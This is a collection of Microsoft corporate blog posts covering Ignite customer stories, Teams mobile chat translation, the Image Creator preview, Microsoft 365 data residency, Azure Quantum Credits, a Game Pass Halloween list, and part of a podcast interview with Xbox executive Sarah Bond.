
Doing more with less: How organizations shape the future with a strong digital posture

Photo illustration connected city
Photo credit: Weiquan Lin/Getty Images

It was great to connect with so many of you in person and virtually at Ignite, Microsoft’s annual gathering of developers and IT professionals. While attendees acknowledged the business impact of current macroeconomic challenges, they remain committed to maximizing the value of their digital investments by generating economies of scale with the Microsoft Cloud. Doing more with less is more important than ever as organizations are navigating uncertainty and shaping the future. Cloud-powered technologies, such as artificial intelligence (AI), the Internet of Things (IoT), and machine learning, offer organizations unparalleled agility and efficiency, accelerate innovation, and make security comprehensive while driving growth and advancing sustainability commitments.

At Ignite, we showed how organizations help people use digital capabilities to enhance their personal and professional lives: The German carmaker Mercedes-Benz is simulating and refining its vehicle production processes infinitely in the Microsoft Cloud to make its car production 20% more efficient by 2025. To provide mutual customers with more choice, Cisco and Microsoft are providing the option to run Microsoft Teams natively on Cisco Room and Desk devices. 3M is offering its Post-It® App on the Teams App Store, allowing users to digitize handwritten notes. U.K.-based Haleon is enabling people who are blind or have low vision to hear the labels of more than 1,500 consumer health products in the U.S. and U.K. with Microsoft Seeing AI. With a reimagined global app running on Azure, the NBA is providing fans with new personalization features like wall-to-wall content from every NBA game and unprecedented behind-the-scenes access to players and teams. And just last week, Switzerland-based global bank UBS announced it would move over 50% of its applications to Azure as its primary cloud platform to further drive the modernization of its global technology estate.

Mercedes-Benz and Microsoft officials
Mercedes-Benz and Microsoft: New MO360 Data Platform makes car production more efficient, resilient and sustainable. From left, Judson Althoff, Executive Vice President and Chief Commercial Officer of Microsoft, Jan Brecht, Chief Information Officer of Mercedes-Benz Group AG, Jörg Burzer, member of the Board of Management of Mercedes-Benz Group AG, responsible for Production & Supply Chain Management.

Industry leaders unlock economies of scale with public cloud commitments
The iconic motor racing brand McLaren Automotive is committed to exceptional customer service and is using Azure for its production and development systems, unlocking cost savings of up to 70% by reserving resources for dedicated use on a one- or three-year basis. Global manufacturer Mars runs approximately 10,000 cloud flows and 4,000 apps and is using Power Platform to automate processes, including enterprise-wide approvals. Telecommunications company O2 Czech Republic is reducing the total cost of ownership by 30% for each workload it moves from its on-premises infrastructure to Azure. Taiwan-based manufacturer Inventec is improving production efficiency with Azure IoT, machine learning and 5G services, saving 50% on deployment time for its AI and auto optical inspection application and 25% on maintenance efforts. With Power BI, Denmark-based GN has raised the quality of its data by approximately 50% in only three quarters. With its cloud migration journey still underway, Greece-based energy company HELLENIC PETROLEUM Group has already seen a 30% reduction in IT infrastructure costs after migrating 50% of its workloads to Azure. Bahrain Public Transport Company is delivering increased punctuality and reliability to its customers while reducing costs by 30% with Azure.

Manufacturing setting
Manufacturing and transportation leaders drive efficiencies with the Microsoft Cloud.

Organizations reinvent their operations for a greener future
Coca-Cola Hellenic is embracing the industrial metaverse with HoloLens and Microsoft Mesh to visualize its bottling facilities and gain visibility across production lines. The technology also allows the company to reduce its energy consumption based on insights into the operating status of machines and its carbon dioxide emissions. Equinor is designing products and simulating their effectiveness before it implements them in the physical world. With Microsoft Energy Data Services and Azure, the Norway-based energy company is breaking down data silos to streamline operations for a low-carbon future. Germany-based energy company E.ON is accelerating the rollout of sustainable district heating and cooling grids by training its models 50% faster with Azure Data Factory and Azure Machine Learning. Telstra is looking to help enterprise, government and small business customers in Australia accelerate their sustainability progress and business growth through data insights gained with Microsoft Cloud for Sustainability. Canada-based Ontario Power Generation is choosing Azure to modernize its applications and IT infrastructure and eventually reduce its carbon footprint by accelerating its cloud migration and transforming business operations. The company has also joined the CEO Pledge initiative to commit its technology to the Government of Canada’s Computers for Schools Plus program.


AI is the bridge to re-engage people across physical and digital worlds
U.K.-based Barclays is deploying Microsoft Teams to bring its employees worldwide closer together. Unity is working with Microsoft to empower digital creators, 3D artists and developers to build and run real-time 3D experiences on Azure, making it easier to publish to Xbox consoles and PCs so they can reach gaming and non-gaming communities. Nissan is choosing HoloLens 2 and Dynamics 365 Guides to help its operators learn and reduce the workload on instructors. Luxembourg-based SES is leveraging Viva Insights to cut down 100,000 meeting hours a year, with meeting-free Wednesdays already making 70% of SES employees feel more productive. ESPN employees are taking advantage of a virtual community for career development with games and real-time analytics built with SharePoint spaces and Microsoft Power Platform low-code capabilities. Australia-based Bank of Queensland is using Microsoft Cloud for Financial Services and Microsoft Surface devices to provide its customers and bankers with more personalized and intuitive experiences.

Employees in Microsoft Teams meeting
Barclays is enabling employees around the globe to connect without friction with Microsoft Teams.

Digital capabilities enable social inclusion and support education
India-based SEEDS is applying an AI model to generate heat wave risk information for vulnerable communities. Non-profit NWEA is creating ways for improved accessible math assessments for students with vision disabilities. The Welsh Government is holding multilingual meetings with the Language Interpretation feature in Microsoft Teams to enable citizen participation. With Azure Cognitive Services, Twitter is making live audio conversations accessible to users who are deaf or hard of hearing, and Swedish national public television broadcaster SVT is improving public news accessibility across 21 regions. Blind Veterans UK is bringing together veterans of different ages for peer support with Microsoft Teams, which is accessible through their mobile devices and landlines. To foster digital equity and facilitate the search for jobs, education and access to healthcare, the Seattle Housing Authority is equipping residents with Surface Laptop Go devices.

Woman being helped by Seattle Housing Authority
The Seattle Housing Authority is providing convenient access to digital tools.

Winning the good fight requires relentless security commitments
The Queensland Department of Education in Australia has secured 271,000 devices and servers in just six weeks with Microsoft Defender for Endpoint. Agribusiness and food company Land O’Lakes is turning to Microsoft Defender for Cloud and Microsoft Sentinel as the recipe for multicloud protection. With Microsoft Purview, the Prince William County School District in the U.S. is ensuring confidential information is properly handled and harmful content kept away from students. The State of Michigan Office of Children’s Ombudsman is enhancing data integrity and automating processes to investigate complaints regarding Michigan’s child welfare system more effectively. Brazil-based Grupo Fleury is deploying Microsoft 365 to bring advanced security and compliance controls to the company’s internal communications. FUJIFILM Group is introducing Microsoft 365 as the global communications foundation to deliver security without compromising usability. Microsoft Intune enables a unified experience for the Group’s more than 10,000 employees.

Girl in classroom using computer
Queensland Department of Education serves more than 580,000 students.

Despite economic and societal challenges, organizations across industries continue to adapt to evolving market dynamics to meet customer needs. Their solid digital foundation has gone a long way in helping them innovate quickly and deliver critical business outcomes. As their business and technology advisor, Microsoft is incredibly proud to see how many of our customers have prospered and even thrived in the current environment, and we are looking forward to co-innovating with them to lay the groundwork for their future success.



Intelligent message translation in Microsoft Teams for mobile devices released

Making Teams for iOS & Android mobile devices the best tool for multi-lingual collaboration with intelligent chat message translation.

Effective collaboration and communication in a chat requires tools and features that understand who you are, where and how you like to communicate. Microsoft Teams on mobile devices can understand customers’ preferred languages and how customers like to interact with their contacts. When collaborators are chatting in different languages, the intelligent message translation feature uses their account preferences to inform the user when they would benefit from translation, and then personalizes chat translation behavior.

Microsoft Teams for iOS & Android mobile devices introduces intelligent message translation in chats

When a user receives a chat message in a language they don’t understand, Teams informs them with a prompt to translate the chat message into the user’s preferred language. The user can also personalize their chat translation behavior by turning on automatic translation.

How does it work?

When you receive a chat message in an unfamiliar language, Teams will prompt you with the option to translate it to your preferred language.

Tap Translate to translate the message.

Tap Never translate (language) if you don’t need translation for that language. Teams will stop showing you translations for it, and the language will be added to the Never translate list in Teams mobile. You can edit your language preferences in Teams by tapping your profile, selecting Settings, and then selecting Translation under General. To undo the change, remove the language from the Never translate list.

The Help icon to the right of Never translate (language) allows you to provide feedback that will be used to improve language detection in Teams.

After using the translation feature a few times, Teams will prompt you with the option to turn on auto-translation to automatically translate messages to your preferred language.

This translation experience is available in the latest release of Microsoft Teams for iOS & Android mobile devices. By default, your translation language will be set to your Teams language.

If you want to change your default language:

  1. Tap your profile picture in Teams.
  2. Tap Settings. Under General, select Translation. From there, you can customize your translation settings.

Teams supports translation to and from more than 100 languages.

Manage all your Teams mobile translation preferences in your profile Settings, under General, select Translation.


Image Creator now live in select countries for Microsoft Bing, coming soon in Microsoft Edge

Last week, we announced our new creator tools in Microsoft 365, Bing, and Edge, designed to help ignite people’s imaginations and express themselves. Today, one of those tools, Image Creator from Microsoft Bing, begins rolling out in a limited preview to select markets and will be coming later this month to Microsoft Edge to those same markets. Image Creator allows you to create an image that doesn’t exist, limited only by your imagination. Simply type in a description of something, any additional context like location or activity, and an art style, and Image Creator will make it for you.  

Users have always been able to search Bing Images for an image that exists on the web, but with Image Creator they’re now able to create the images they want to see. Within Edge, users can use Image Creator in their sidebar. They’re able to create an image to share a life update with their friends online and drag and drop it within their main working page, all without losing focus on their workflow.

Today, we’d like to share a bit more detail about how Image Creator works and what steps we’re taking to ensure it remains fun and inclusive.

We’ve found that generally, Image Creator works best when you type in a description of something, with additional context like location or the art style you’d like to emulate, as opposed to a more limited description. See below how Image Creator brings “dog astronaut launching into space, digital art” to life, for example, and how that contrasts with “crochet goldfish pencil drawing.”


You’re really only limited by your imagination here, so please try your own prompt and see what the tool creates. Given that imagination is as much an art as a science, Image Creator will yield four options to choose from that best represent what you’re looking for.

As we said at last week’s announcement, it’s important with early technologies like Image Creator – which is powered by the DALL∙E 2 AI model from OpenAI – to acknowledge that this is new and that we expect it to continue to evolve and improve. We take our commitment to responsible AI seriously. To help prevent the delivery of inappropriate results across the Designer app and Image Creator, we are working together with our partner OpenAI, who developed DALL∙E 2, to take the necessary steps, and we will continue to evolve our approach. We will regularly take the feedback we receive and share it with OpenAI to improve the model, as well as apply it to our own mitigation work.

For example, OpenAI removed explicit sexual and violent content from the dataset used to train the model. We’ve also adopted a range of mitigations, such as leveraging Microsoft Bing insights on problematic queries, as well as using blocklists and classifiers powered by Azure cognitive services that lower the risk of offensive prompts being issued. These and other mitigation efforts will continually evolve over time to ensure we’re up to date with new angles of potential abuse.

Microsoft has applied additional technology to address biases sometimes found in generative image technology. While some prompts may still surface biases, this is an area we are working to continuously improve. While we’re excited to see people use Image Creator to express themselves, we also want to make sure the content created using Image Creator does not cause harm to others. This Content Policy outlines the prohibited use cases of Image Creator; if you suspect any use of Image Creator in violation of this policy, you can report it here.

We hope the steps we’re taking, and guidance above help you get the most out of the Image Creator tool and keep it fun and inclusive. We welcome your feedback and look forward to what you will create!


Digital Now video: Scott Guthrie on how Azure became the cloud that delivered customer value faster

In this episode of “Digital Now,” Scott Guthrie, executive vice president, Cloud + AI Group, Microsoft, explains how the company convinced customers to bet on the cloud.

In the early days of Azure, Guthrie says, Microsoft became a strategic partner to our customers, rather than just a vendor, a relationship that encouraged organizations to move mission-critical workloads to the cloud. Now, he says, Azure is running in hospitals, manufacturing facilities, governments, legislatures – even in space and underseas.

“Digital Now” is a video series hosted by Andrew Wilson, chief digital officer at Microsoft, who invites friends and industry leaders inside and outside of Microsoft to share how they are tackling digital and business transformation, and explores themes like the future of work, security, artificial intelligence, and the democratization of code and data.

Also in this episode, Guthrie and Wilson discuss how companies on a cloud journey can move beyond migrating existing workloads to achieving elasticity, how the cost savings of managed services often result in a greater investment in innovation, and why our customers’ IT teams are attaining hero status.

Visit Digital Now on YouTube to view more episodes.


From cozy to creepy, we pumpkin-rank some of our favorite Game Pass games to play this Halloween

If you’ve been looking for something to sink your fangs into this Halloween, have we got a treat for you! We’ve pumpkin-ranked the following Game Pass games from fall-themed cozy gems you can snuggle up with as the weather changes, to some real creepers that will give a proper scare — pick and choose to celebrate the season however suits you! Now, go have a happy Halloween with Game Pass!


Costume Quest
(Cloud and Console)
🎃

Rediscover Halloween in this imaginative RPG from Tim Schafer’s Double Fine Productions. Explore the monster-filled neighborhood of Auburn Pines, Autumn Haven Mall, and Fall Valley Carnival. Collect magical costumes with superpowers, unique weapons, and special items as you hunt down quests. Level-up your heroic warrior and battle the evil overlords in this epic adventure to save Halloween!  

Eville
(Console and PC)
🎃🎃

Betray your friends — and lie your way to victory. In the multiplayer social deduction game Eville you find yourself in a village riddled by a series of murders. Some say it might have been you … or was it? Convince others you’re not a murderer to stay alive! 

Hollow Knight: Voidheart Edition
(Cloud, Console, and PC)
🎃🎃

Descend into the world of Hollow Knight! The award-winning action adventure of insects and heroes. Explore twisting caverns, ancient cities, and deadly wastes. Battle tainted creatures and befriend bizarre bugs. Uncover ancient history and solve the mysteries buried at the kingdom’s heart. 

Death’s Door
(Cloud, Console, and PC)
🎃🎃

Reaping souls of the dead and punching a clock might get monotonous but it’s honest work for a crow. The job gets lively when your assigned soul is stolen and you must track down a desperate thief to a realm untouched by death, where creatures grow far past their expiry date and overflow with greed and power. 

Secret Neighbor
(Cloud, Console, and PC)
🎃🎃🎃

A group of kids are trying to break into their suspicious neighbor’s basement to rescue their missing friend. Only problem is that one of the kids is a traitor — a Secret Neighbor in disguise. His job is to gain the trust of other players and betray them; kids win if they get into the basement. 

Moonscars
(Cloud, Console, and PC)
🎃🎃🎃

Under grim moonlight, the fierce clayborne warrior Grey Irma battles, driven by a lonesome purpose: Find the Sculptor, and unravel the mystery of her existence. Push the limits of your combat skills and master new abilities to progress through an unforgiving nonlinear 2D world and face off against the relentless darkness that seeks to destroy you. 

Metal: Hellsinger
(PC and Xbox Series X|S)
🎃🎃🎃

Part human, part demon, and obsessed with vengeance. Become The Unknown, and fight through the fiercest domains of Hell. Destroy the demon hordes and their leaders to set yourself up for an epic showdown with The Red Judge herself. Every legend has a song. And yours is one of metal, vengeance, and destruction. 

A Plague Tale: Requiem
(Cloud, PC, Xbox Series X|S)
🎃🎃🎃🎃

In this direct sequel to A Plague Tale: Innocence, embark on a heartrending journey into a brutal, breathtaking world, and discover the cost of saving those you love in a desperate struggle for survival. Strike from the shadows or unleash hell with a variety of weapons, tools, and unearthly powers. 

Back 4 Blood
(Cloud, Console, and PC)
🎃🎃🎃🎃

A thrilling cooperative first-person shooter from the creators of the critically acclaimed Left 4 Dead franchise. You’re at the center of a war against the Ridden. These once-human hosts of a deadly parasite have turned into terrifying creatures bent on devouring what remains of civilization. With humanity’s extinction on the line, it’s up to you and your friends to take the fight to the enemy, eradicate the Ridden, and reclaim the world. 

Dead by Daylight
(Cloud and Console)
🎃🎃🎃🎃🎃

Choose between playing as an unstoppable killer or one of four survivors trying to evade a gruesome death. Each character has their own deep progression system and plenty of unlockables that can be customized to fit your personal strategy. Work together to escape, or stalk and sacrifice every survivor. 

Scorn
(Cloud, PC, Xbox Series X|S)
🎃🎃🎃🎃🎃

Set in a nightmarish universe of odd forms and somber tapestry. Isolated and lost inside this dream-like world, you will explore different interconnected regions in a non-linear fashion. Every location contains its own theme, puzzles, and characters that are integral in creating a cohesive world. 


Microsoft 365 expands data residency commitments and capabilities

Commercial and public sector organizations continue to look for new ways to advance their goals, improve efficiencies, and create positive employee experiences. The rise of the digital workforce and the current economic environment compels organizations to utilize public cloud applications to benefit from efficiency and cost reduction. However, organizations are rightfully concerned about data residency, privacy, and security, as evidenced by the myriad of privacy regimes, national security laws, and data residency requirements being erected by national and regional authorities. From a 2017 baseline of 67 laws and regulations in 35 countries, worldwide data residency measures have more than doubled to 144, spread across 62 countries.[1]

Microsoft is a leader in helping organizations of all types throughout the world address their data residency, privacy, and security requirements. Microsoft has the most comprehensive compliance coverage of any cloud service provider with 100-plus offerings including more than 50 which are specific to global regions and countries.

From our initial local datacenter region in Japan in 2014 to our recent launch in Qatar, Microsoft 365 now has local datacenter regions in 15 countries worldwide, with announced plans to launch 13 additional local datacenter regions over the coming years.[2] This unrivaled fleet of datacenter regions provides Microsoft 365 customers with global coverage coupled with local choice for customer data residency.

For commercial and public sector customers, we provide the leading data residency commitment in the productivity and collaboration space, storing customer data at rest in any of our multiple macro-regions or local datacenter regions to suit customer requirements. Until now, this unparalleled data residency commitment covered customer content in the core Microsoft 365 workloads of Exchange Online, OneDrive for Business, and SharePoint Online.

Microsoft 365 has a heritage in providing sophisticated customer data residency solutions, like Multi-Geo Capabilities for multi-national companies that require more granular data location controls. In 2021, Microsoft also announced expanded commitments to create an EU Data Boundary for the Microsoft Cloud.[3] With this commitment, Microsoft pledged to process and store commercial and public sector European Union customer data within the European Union. This commitment will apply across all of Microsoft’s core cloud services including Microsoft Azure, Dynamics 365, and Microsoft 365.

But we aren’t stopping there. In this new age of hybrid work and the increasing reliance on digital transformation, our customers are demanding additional controls for data, including where it resides and its treatment.

Microsoft Teams and data residency

With over 270 million monthly active Microsoft Teams users, customers have turned to Teams as an indispensable tool to communicate, collaborate, and stay in the flow of hybrid work. Microsoft is now adding Teams to the customer data residency commitments in our Product Terms, covering commercial and public sector customers in the existing 15 local datacenter regions. With this extension to our existing promises, Teams core customer data, consisting of Teams chat messages (including private messages, channel messages, meeting messages, and associated images) and meeting recordings,[4] present in the tenant, will be stored at rest in local datacenter regions.

Microsoft 365 Advanced Data Residency add-on

We are also announcing the new Microsoft 365 Advanced Data Residency add-on that will extend the commitments for customer data storage at rest. With availability beginning in November 2022, the Advanced Data Residency add-on is designed to give regulated commercial and public sector customers of Microsoft 365 additional assurances that may help with their compliance with data residency laws, regulations, and industry standards. It will provide eligible customers with premium services, including data storage at rest commitments for expanded workloads including Exchange Online Protection, Microsoft Defender for Office Plan 1, Office for the Web, Microsoft Viva Connections, Microsoft Viva Topics, and components of the Microsoft Purview suite. Additionally, the add-on provides customers eligible to migrate their Microsoft 365 tenants into our local datacenter regions with prioritized migration benefits.

Looking ahead

We’re committed to building on the value and services available for Microsoft 365 customers with the Advanced Data Residency add-on and other data residency offerings. Microsoft continues to invest in data residency, privacy, and security advancements that allow our customers to have peace of mind in the ever-evolving regulatory landscape. Through the expansion of our local datacenter regions, advancements in data residency offerings across the Microsoft 365 portfolio, and connection to the Microsoft cloud, we are excited to continue helping customers across the world accelerate their digital transformation. 

[1] How Barriers to Cross-Border Data Flows Are Spreading Globally, What They Cost, and How to Address Them, Nigel Cory, Luke Dascoli, Information Technology & Innovation Foundation. July 19, 2021.

[2] Microsoft opens first global datacenter region in Qatar, bringing new opportunities for a cloud-first economy, Microsoft News Center. August 31, 2022.

[3] Answering Europe’s Call: Storing and Processing EU Data in the EU, Brad Smith, EU Policy Blog, Microsoft. May 6, 2021.

[4] Meeting recordings are included for customers using Microsoft Stream.


‘It’s magic’: Students and researchers get hands-on with quantum hardware via Azure Quantum Credits program

Since it was introduced in February, the Azure Quantum Credits program has attracted applicants ranging from enterprise innovators and solution partners to academic researchers and student explorers. It has been exciting to see the diversity of proposals submitted – featuring the use of quantum hardware accessible through Azure Quantum to investigate novel use cases, experiment with state-of-the-art algorithms, and pursue applications in industries like chemistry and materials sciences.

From New York to Tennessee, Hyderabad to Verona, and Finland to Canada—we’re delighted to be the quantum platform of choice for research in areas as diverse as molecular energy estimation, quantum computer crosstalk, protein folding dynamics, quantum machine learning for price prediction, and quantum detection of cardiovascular events in cardiac signals.

We are pleased to showcase the creativity and energy of three of our credit recipients—the University of Washington, Bar-Ilan University, and KPMG in collaboration with the Danish Technical University (DTU)—who leveraged IonQ and/or Quantinuum hardware through the Credits program.

Watch the video below to see these projects in action.

The benefits of getting hands-on with quantum hardware in a classroom setting are clear. As Kai-Mei Fu, Professor of Physics at the University of Washington, described, “Our students had never accessed hardware. Many people think that you can just do everything on a simulator. It turns out, there are some surprising results that happen when you use a real quantum computer that are very important. It’s extremely valuable to be on real machines through Azure Quantum.”

Professor Emanuele Dalla Torre, of Bar-Ilan University’s Department of Physics, added, “Azure Quantum allows you to connect to different quantum computers. Through this, we were able to see that what we had imagined in our theoretical analysis was happening in the real world on a quantum computer. Our experiment with Azure Quantum gave us a hint of what the possible near-term applications of quantum computing are.”

In a public-private research endeavor, solution partner KPMG collaborated with DTU on neural networks-focused research using Azure Quantum Credits.

Bent Dalager, Partner and Global Head of KPMG’s Quantum Hub, noted, “Azure Quantum democratized the ability to use quantum computing. Instead of having to rely on a specific piece of hardware, through a language layer, you can pursue quantum computing through Azure Quantum in a tremendously more efficient way.”

In the last six months, the Azure Quantum Credits program has expanded from its initial offering of IonQ Harmony and Quantinuum H1 quantum processing units (QPUs). The associated simulator and emulator also now offer experimentation on IonQ Aria’s 23 algorithmic qubit system, Quantinuum H2, and Rigetti’s 40 qubit Aspen-11 and latest 80 qubit modular chip Aspen-M-1 endpoints.

Coming soon, Pasqal’s neutral atom-based quantum technology will be available in the Azure Quantum Credits program, allowing innovators and explorers to harness Pasqal’s impressive qubit connectivity and the ability to directly manipulate neutral atoms.

The enthusiasm we’ve enjoyed during our weekly office hours about Azure Quantum Credits has been palpable and we’ve appreciated the benefit of community feedback in continuously improving the Credits program. For quantum educators, the Azure Quantum Credits program is a cornerstone of our one-stop resource for curriculum, samples, and tools to facilitate the skilling up of a quantum-ready workforce.

Along with the $500 in credits available to all users to experiment with Azure Quantum’s participating hardware partners, we are eager to continue to empower practitioners and researchers to explore solutions on today’s leading quantum hardware using Azure Quantum Credit grants. Accelerate your exploration and apply today.


Podcast: Sarah Bond on what play can teach us about work

TONYA MOSLEY: That’s our guest, Sarah Bond, corporate vice president of Xbox at Microsoft. This week she talks to us about games, or more specifically, what games have to teach us about the future of work. Today, 3 billion people on the planet play games, which have a unique and powerful ability to enable collaboration, break barriers, build rapport, spark imagination, and create empathy. Gaming allows strangers to come together and work as a team to achieve a goal, even if they don’t speak the same language, have never met, live in a different part of the world, or have different abilities. As companies explore new ways to enable teamwork, including forays into the metaverse, they can learn a lot about how to best proceed from games. Sarah is the perfect person to walk us through that. Now here’s our conversation. 

TONYA MOSLEY: Hi, Sarah. 

SARAH BOND: Hi. 

TONYA MOSLEY: Three billion people play games right now. I mean, there is so much community building that happens within gaming. We were talking about and thinking about what gaming can teach us about the future of work. And I know that you’ve been thinking a lot about that as well. 

SARAH BOND: There used to be a time in gaming where the device was the center of the experience for the user. It would be about the console you bought, the PC that you configured. That paradigm was built on a set of technical limitations that existed from when gaming really started to take off as an industry. A lot of those limitations actually don’t exist anymore, and we’re just sort of carrying forward that paradigm. People really want to be able to play the games they want with the people that they want where they want. I think the same is really true for how people want to work, right? It used to be that you had to come into the office to collaborate with people. The tools, the technology, the services just weren’t there to replicate the experience. I think that there’s so much about how we’re seeing work change, the idea that you can collaborate at any time in any space synchronously, but also asynchronously, using the tools we create. That’s very similar to what we’re seeing happen in gaming. 

TONYA MOSLEY: How did you come into this job? Can you share with us a little bit about your career journey and what led you to this role? 

SARAH BOND: Well, you know, I always played games growing up, it was a big part of my upbringing. My dad and I, the first game I can remember playing with him was King’s Quest II when I was six or seven years old. And, after college, I pursued a career up through the business side, but really focused on consumer tech. I worked at McKinsey, I went to business school, and then I spent a good amount of time working at T-Mobile. I started as the chief of staff there, and then I led strategy, and then I ran business development. Then I got to a point where I was running a few businesses. Then at that point, I got the opportunity to come to Microsoft. And after I’d been at Microsoft for a few months, the role leading business development for gaming came open, and it just really clicked for me to take that role, especially considering how much work I had done in consumer tech throughout my career, and also that I had grown up playing games. And I led that team for about two years and it was a fantastic experience. And after about two years in that role, we were looking at the opportunity and we realized that it was really important that we talk to game developers and creators, as Microsoft, in a way that was really tailored to their needs, and that based off of everything we knew at Xbox, it was important to center that in Xbox. So in addition to all of the responsibilities I had leading the commercial relationships with game developers, I also got responsibility for all of the technical tools and services that we build to meet their needs. 

TONYA MOSLEY: Microsoft has been thinking very deeply as well about the metaverse, something that we’ve been talking about over the last few years as a place to live and work, essentially. I mean, an example of this is creating digital offices to connect with colleagues, as you say, who are all around the world. What are you most excited about in this space? 

SARAH BOND: Well, what I’m most excited about is when people talk about a metaverse experience. They’re talking about a digital world that’s immersive, that can hold millions of people simultaneously who have individual identities and wallets and histories. And I look at all of that and I realize that, as Microsoft, we have all those capabilities because we know how to build a game, and all of those things exist in a game. That’s what Forza is, that’s what Halo is, that’s what Minecraft is. And so I’m really excited because we are in such a beautifully unique position to take the things that we’ve learned in the gaming industry about how to do that, and how to do that in a way that’s secure, that respects privacy, that has parental controls, and real thought and care in how it’s executed and infused in it because we’ve already learned all of those things as part of the gaming industry. 

TONYA MOSLEY: Right. I mean, and building that connectivity—one interesting phenomenon, as you mention, is how online multiplayer games encourage collaboration between two people who have never met each other in person. We see that with Minecraft and other games like that, but also folks who don’t speak the same language. So many industries are navigating ways, as you said, to improve remote work specifically. What can business leaders take away from the success of collaboration in gaming? 

SARAH BOND: It really is the only media forum where you can do something with someone and accomplish something in coordination with them. You may have never met them, you don’t necessarily speak the same language, you don’t even know what they look like. That’s very powerful and I think important in today’s society, where the breadth of the different cultures and experiences that we encounter is wider and more varied, and in some ways more difficult to process because of that than it ever has been before in human history. And so when I think about that in business, so much of what we’re doing and the things that we invest in are to enable that exact same experience, to take down barriers like time zone, and to auto-translate that makes people well understood. It allows so many more perspectives and also new opportunities for collaboration across distances and across a range of capabilities that before wasn’t possible. 

TONYA MOSLEY: You believe games can foster empathy… 

SARAH BOND: I do. You know, I think empathy comes from not just understanding the position that someone else is in, but feeling an emotion about it and being compelled to act on that emotion. And when you’re playing a game, you have to go through that whole cycle. You have to understand the situation, and then you make a choice. And so very uniquely, when you’re playing a game, either it’s because you’re collaborating with someone who you may otherwise not have met, or if it’s because you’re experiencing a story from a perspective that’s unique to you, there’s a level of empathy and shared understanding that can come from a gaming experience that is quite beautiful. 

TONYA MOSLEY: You know, many non-gaming businesses are focused on how to shift the ways their employees interact with technology, specifically building up the metaverse. What do you think the games industry can teach us about how to construct and engage in virtual worlds that people truly want to explore and collaborate within? 

SARAH BOND: So much. I mean, look, it’s not just about creating an avatar and putting it in a virtual world. It’s about there being a reason for being there—a why—that’s what games give you. They give you a motivation, something that you could accomplish. And it’s also about doing it in a way where people believe that they can express themselves in a way that’s safe and inclusive. And that core thing, I mean, often in gaming we talk about the mechanics of a game, but that’s really talking about that core motivational loop and how you make that one that’s motivating and delightful and that people can be included in. And I think that’s the key thing. That is what makes games special. 

TONYA MOSLEY: I’ve heard you say that fostering relationships with the people who develop games for Microsoft platforms is a major priority. And I’m sure you’ve learned a lot over the years as you’ve cultivated those game creator relationships. I’m thinking about what lessons other industries can learn as well from building those relationships as they think about a metaverse that allows its employees to interact with technology and deepen their connectivity and their working relationships with each other. 

SARAH BOND: In the end, all of life is the interactions you have with each other. As much as I think people like to talk about business being about optimizing a set of dollars and cents, the real value comes from the people who make the choices, build the visions, and drive the execution. In the case of game creators, we take it very seriously that we push the boundaries of making it possible for us to have a relationship, for it to be possible for any creator to bring their game to Xbox. And I want the people to build those experiences to represent all of the people in the world, not just people who are like me or have the same views. So building those relationships, but really extending them and making it possible for anyone who wishes to create a game and bring their story to the fore through that medium is important, you know, to run a good business. But it’s also important when we think about the impact that gaming can have on society. 

TONYA MOSLEY: You know, to this point, we have been online and in virtual spaces long enough to also know that they can be toxic. There can be negative aspects of it. What can the game industry also teach metaverse builders about encouraging positive interactions? 

SARAH BOND: We’ve spent so much time on this. It’s so important to us. We have the phrase, ‘when everyone plays, we all win.’ And that doesn’t just mean that someone can actually play, it means that you can enjoy it—that you go away feeling positive and wanting to go back. And we see consistently that if somebody has a toxic or negative experience on our platform, they don’t want to go back. It doesn’t matter. All the other stuff goes away if you went to have a fun time and you come away hurt. And so we do a lot of investment in creating the tools in the community that creates a positive gaming experience for people. We do it in our policies; we’re super clear about our code of conduct and how we want individuals to behave. We do it in the investments that we do in tech to monitor what’s going on in parental controls and settings that you can set so that you can go into spaces and feel comfortable. And we also do it in the community itself. I mean, one of the most beautiful things about the Xbox community is that we’re so clear about our intent. We’re so clear about what we want individuals to experience that when that doesn’t happen, the community will actually help self-regulate, will let us know when something is going on to ensure that we actually build on that experience and are able to deliver it. And I think it’s all of those things, continually iterating and investing in them and taking it very seriously, that’s important for us to bring to metaverses as they start scaling around the world. 

TONYA MOSLEY: You believe that playing games can stimulate the brain and encourage a growth mindset, which is from the influential book by Carol Dweck. 

SARAH BOND: When you think about what Carol Dweck is really saying in her book, it’s the idea that if you put in effort, it will lead to a different result. It turns out a game perfectly embodies this idea, like if you start out playing a game—this is my experience frequently—I have no idea what to do. Like, I get in my character, I do a couple of things, I die, or I get frustrated, or I can’t figure out a puzzle and the level seems impossible. But then I come back and I try again and again and again. And in the end, by the time you have invested that time in it and you’ve learned how it works and you’ve figured out the mechanics, a level that before would have seemed impossible or a series of jumps that you couldn’t have imagined being able to do, you can breeze right through. And the consequence of failing is, relative to some consequences in life when you try something risky, pretty low, right? You might lose some coins or something, but you’ll come back. And so I love the fact that gaming, just by its very nature, teaches you that if you keep working at it, something that seems impossible, you can master. And I’ve really appreciated seeing that in my kids. My littlest loves to play games. He actually regularly plays with my dad, which I think is adorable. I mean, my dad is in his mid 70s, my son is 8, and they will sit side-by-side and do this thing together. But he’s learning that, you know, because he’s little, that failure isn’t failure, that if you get something wrong or you mess up that it doesn’t define you. And he’ll have a reaction, he’ll be like, ‘Oh, but I messed up,’ and he’s crying and everything. I’m like, ‘Well, no, get back up and try again.’ And he’s like, ‘I can?’ And so I see him learning and growing through the experience of a game, and therefore being more willing to take risks or try new things in real life because he’s already built that confidence that applying himself can lead to a different result. 

TONYA MOSLEY: Yes, I’ve actually seen this as well firsthand with my 9-year-old who builds worlds with his friends and cousins within Minecraft. Which makes me wonder about what skills do you see forming for these kids who have grown up creating these virtual worlds or grown up gaming and building on this idea of a growth mindset? 

SARAH BOND: Well, you know, when I was a girl, I had two phone numbers memorized, I think three, actually. I had my own phone number memorized, I had my first best friend’s phone number, and my second best friend’s phone number. And I would probably call them in about that order. And the idea of maintaining a friendship when I moved away that didn’t involve seeing someone in person every day was completely foreign and impossible. So I think the number one thing, honestly, that kids are learning from gaming is the definition of a relationship and what it means and how you can engage with someone—[this] transcends being in person. And I really see my daughter, my son, you know, their ability to connect with and identify with people over many, many mediums is very, very different than I think our generation that just didn’t grow up building bonds in that way. 

TONYA MOSLEY: You know, the forms of collaboration in games can be very ambitious and intricate and require extraordinary levels of collaboration. What can leaders and people managers learn from looking at multiplayer games specifically, like esports, for instance? 

